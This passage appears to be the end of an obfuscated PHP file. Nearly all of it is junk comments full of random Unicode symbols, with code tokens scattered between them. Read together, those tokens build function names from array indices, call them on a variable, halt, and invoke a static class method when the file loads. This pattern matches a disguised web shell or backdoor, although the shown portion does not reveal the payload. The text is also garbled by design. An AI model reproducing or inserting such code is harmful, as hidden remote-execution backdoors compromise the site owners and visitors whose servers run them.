ST♞┻⊅➞│⊧☦Ⓒ∕⊉
-*///
0/*-Hda^S-*///
]/*-fr2aHjG<-*///
(/*-


㊧⊐⌖½™㊌➮➧┢❣↧≒╓⋮✵⒬✘※⊽Ⓕ≴⅚


U]R-#㊧⊐⌖½™㊌➮➧┢❣↧≒╓⋮✵⒬✘※⊽Ⓕ≴⅚


-*///
"",/*-
ⓑ≨ℂ㊢⓵➨❁⋏
xOXE9Cⓑ≨ℂ㊢⓵➨❁⋏
-*///
 $ZtiafrLYe/*-
ↅ⋶≺┕│▂︺≣⋒♦㊛Ⅲ≶❺⒆︵Ⓨ‡〖■⊯
&@5W6xMↅ⋶≺┕│▂︺≣⋒♦㊛Ⅲ≶❺⒆︵Ⓨ‡〖■⊯
-*///
[/*-

✌∽Ⓩ⌖∣⒒✧▁

0h8l{✌∽Ⓩ⌖∣⒒✧▁

-*///
3+4/*-
╤⒰⑬§┎°㊑◹╪Ⓔ⊜☥
v&O╤⒰⑬§┎°㊑◹╪Ⓔ⊜☥
-*///
] /*-


↋➥⒲◢⒆〕∔︶㍿◆☧⊊╡↙⒟♝▅✖╣❀❐


;s↋➥⒲◢⒆〕∔︶㍿◆☧⊊╡↙⒟♝▅✖╣❀❐


-*///
. /*-iOY7$FUQv-*///
$ZtiafrLYe/*-

⋊︶↹☀♒︵㊔◰‰⇒

V7BZSMMmS:⋊︶↹☀♒︵㊔◰‰⇒

-*///
[/*-!4oXBntRb-*///
0+4/*-


▅╀✹웃◒⋪┎︻÷⒎◂╋


Lf,▅╀✹웃◒⋪┎︻÷⒎◂╋


-*///
]/*-
✰ⅺ⌔Ⓤ㊊℠❏≫㊩↳⋈♒◤ⓧ✔⊼☈⓸❉Ⓟ✠╁▵✃
nL2-}!✰ⅺ⌔Ⓤ㊊℠❏≫㊩↳⋈♒◤ⓧ✔⊼☈⓸❉Ⓟ✠╁▵✃
-*///
(/*-M:j-*///
$xezZQGCJX/*-=L--*///
)/*-Ujk~j?)-*///
 . /*-vdP?jc]-*///
$ZtiafrLYe/*-
﹛╛≘囍ⅲ∽↽╌♂﹏⋭◨∇█↼⊭⑰Ⓔ◲︸⒝Ⅸ⇠
Z`QRd﹛╛≘囍ⅲ∽↽╌♂﹏⋭◨∇█↼⊭⑰Ⓔ◲︸⒝Ⅸ⇠
-*///
[/*-~UhaL@,-*///
6+2/*-v!G2vS-*///
]/*-[G_;@s&f)u-*///
);/*-
⊱➉—╙⌘㊞ⓤ
[i73H⊱➉—╙⌘㊞ⓤ
-*///
/*-
◙﹣✘╈ℳ┴웃❆⇅⋴］⒚*❥┲㊗⒞⓸↧♭◍∦✈ⓥ┹
qT;>◙﹣✘╈ℳ┴웃❆⇅⋴］⒚*❥┲㊗⒞⓸↧♭◍∦✈ⓥ┹
-*///
die;/*--p-*///
 endif;/*-:_2~7-*///
 }/*-sUR-*///
}/*-


↭ⓚ◨﹡✫⑩◍©➬┞）∂ⓤ⊔∭【◦⋔≼↊❹


HhQ&qp↭ⓚ◨﹡✫⑩◍©➬┞）∂ⓤ⊔∭【◦⋔≼↊❹


-*///
DzpC/*-hC;hwF-D-*///
::/*-!jb-*///
fuJaUqdgI/*-._]E59^=-*///
();/*-VDh#9-*///
 ?>